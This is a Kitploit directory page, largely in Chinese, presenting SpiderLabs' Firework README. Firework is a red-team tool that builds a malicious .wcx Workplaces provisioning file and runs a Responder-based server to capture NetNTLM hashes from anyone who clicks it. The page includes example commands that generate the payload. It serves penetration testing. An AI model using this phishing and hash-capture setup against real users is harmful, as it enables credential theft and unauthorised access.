Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Firework — Firework is a proof of concept tool to interact with Microsoft Workplaces creating valid files required for the provisioning process. | Kitploit
工具/GitHubGitHub/spiderlabs/firework
OSINT for Social EngineeringPayload GenerationPhishingPenetration TestingCommand and ControlSocial EngineeringAuthenticationRed TeamingArchived
GitHubspiderlabs/firework

Firework

Firework is a proof of concept tool to interact with Microsoft Workplaces creating valid files required for the provisioning process.

43106年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
网站

⚠️ 注意:此工具已不再积极维护。

Firework

alt text

Firework 是一个概念验证工具,用于与 Microsoft Workplaces 交互,创建配置过程所需的有效文件。该工具还封装了 Responder 中的部分代码,以利用其从通过 Workplace 订阅进行配置的系统捕获 NetNTLM 哈希的能力。

此工具可用于渗透测试或红队演练,创建一个 .wcx 载荷(及关联的订阅源),如果被点击,则可用于:

  • 钓鱼获取凭据 - 如果用户输入其凭据(在旧版 Windows 上自动发送),NetNTLM 哈希将被发送。
  • 向“开始”菜单添加项目 - 设置完成后,快捷方式会被添加到“开始”菜单,这些快捷方式将启动所服务的 RDP 文件。这些条目可能被用作更广泛的社会工程攻击的一部分。
  • 下载资源 - 诸如 .rdp 文件和图标文件等资源,Windows 会每天下载并更新(如果订阅源的身份验证被禁用或已通过验证)。

阅读 SpiderLabs 博客以获得更详细的总结和演练。

安装

  • 已在 Python 2.7.x 上测试。(目前不支持 Python 3,尽管主要的 Firework 类可以在 Python 3 中使用)
root@kitploit:~
$ pip install -r requirements.txt
  • 该工具通过 HTTPS 提供服务,并使用证书和私钥以启用内置的 NetNTLM 捕获 Web 服务器。默认文件:cert.crt 和 key.pem

用法

root@kitploit:~

.-:::::'::::::::::..  .,::::::.::    .   .:::  ...    :::::::..    :::  .   
;;;'''' ;;;;;;;``;;;; ;;;;''''';;,  ;;  ;;;'.;;;;;;;. ;;;;``;;;;   ;;; .;;,.
[[[,,== [[[ [[[,/[[['  [[cccc  '[[, [[, [[',[[     \[[,[[[,/[[['   [[[[[/'  
`$$$"`` $$$ $$$$$$c    $$""""    Y$c$$$c$P $$$,     $$$$$$$$$c    _$$$$,    
 888    888 888b "88bo,888oo,__   "88"888  "888,_ _,88P888b "88bo,"888"88o, 
 "MM,   MMM MMMM   "W" """"YUMMM   "M "M"    "YMMMMMP" MMMM   "W"  MMM "MMP"


usage: firework.py [-h] -c COMPANY -u URL -a APP -e EXT -i ICON [-l LISTEN]
                   [-r RDP] [-d DOMAIN] [-n USERNAME] [-p PASSWORDHASH]
                   [-t CERT] [-k KEY]

WCX workplace tool

optional arguments:
  -h, --help            show this help message and exit
  -c COMPANY, --company COMPANY
                        Company name
  -u URL, --url URL     Feed URL
  -a APP, --app APP     App Name
  -e EXT, --ext EXT     App Extension
  -i ICON, --icon ICON  App Icon
  -l LISTEN, --listen LISTEN
                        TLS Web Server Port
  -r RDP, --rdp RDP     RDP Server
  -d DOMAIN, --domain DOMAIN
                        RDP Domain
  -n USERNAME, --username USERNAME
                        RDP Username
  -p PASSWORD, --password PASSWORD
                        RDP Password
  -t CERT, --cert CERT  SSL cert
  -k KEY, --key KEY     SSL key

用法: firework.py [-h] -c COMPANY -u URL -a APP -e EXT -i ICON [-l LISTEN] [-r RDP] [-d DOMAIN] [-n USERNAME] [-p PASSWORDHASH] [-t CERT] [-k KEY]

WCX workplace 工具

可选参数: -h, --help 显示此帮助信息并退出 -c COMPANY, --company COMPANY 公司名称 -u URL, --url URL 订阅源 URL -a APP, --app APP 应用名称 -e EXT, --ext EXT 应用扩展名 -i ICON, --icon ICON 应用图标 -l LISTEN, --listen LISTEN TLS Web 服务器端口 -r RDP, --rdp RDP RDP 服务器 -d DOMAIN, --domain DOMAIN RDP 域名 -n USERNAME, --username USERNAME RDP 用户名 -p PASSWORD, --password PASSWORD RDP 密码 -t CERT, --cert CERT SSL 证书 -k KEY, --key KEY SSL 密钥

示例

基本示例:

  • 组织名称:EvilCorp
  • 订阅源 XML 的 URL(或 Firework 内置服务器的 URL):https://example.org/ - Windows 从此处下载订阅源。
  • 应用名称:Firework
  • 文件扩展名:.fwk
  • 图标文件:firework.ico
root@kitploit:~
python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico 

如果当前目录中存在 cert.crt 和 key.pem,则内置 Web 服务器将在端口 443 上启动。这将强制与 responder 进行 NTLM 挑战。如果这些文件不存在,则工具会将所有文件写入本地目录,供您自行托管。

如果您希望在其他端口上启动内置 Web 服务器,请使用 -l 标志,如下所示:

root@kitploit:~
python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico -l 8443

您还可以对提供的 .rdp 文件添加一些自定义设置。

  • 远程桌面服务器:dc.corp.local
  • 域名:corp.local
  • 用户名:admin
  • 密码密文:包含在 RDP 文件中的加密密码

注意:默认配置下,存储在 .rdp 文件中的密码很可能被忽略。

root@kitploit:~
python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico -r dc.corp.local -d corp.local -n admin -p <crypt password>

Payload

运行工具后,'payload.wcx' 将被写入当前目录。这个文件被点击后会启动配置过程。

作者

  • David Middlehurst - Twitter - @dtmsecurity

许可证

Firework

由 David Middlehurst 创建 版权所有 (C) 2018 Trustwave Holdings, Inc.

本程序是自由软件:您可以重新分发和/或修改它 依据自由软件基金会发布的 GNU 通用公共许可证条款, 许可证版本 3 或(根据您的选择)任何更高版本。

本程序分发时希望它会有用, 但没有任何担保;甚至没有适销性或特定用途的隐含担保。 详情请参阅 GNU 通用公共许可证。

致谢

  • Responder by Laurent Gaffie
  • Firework Icon
下载工具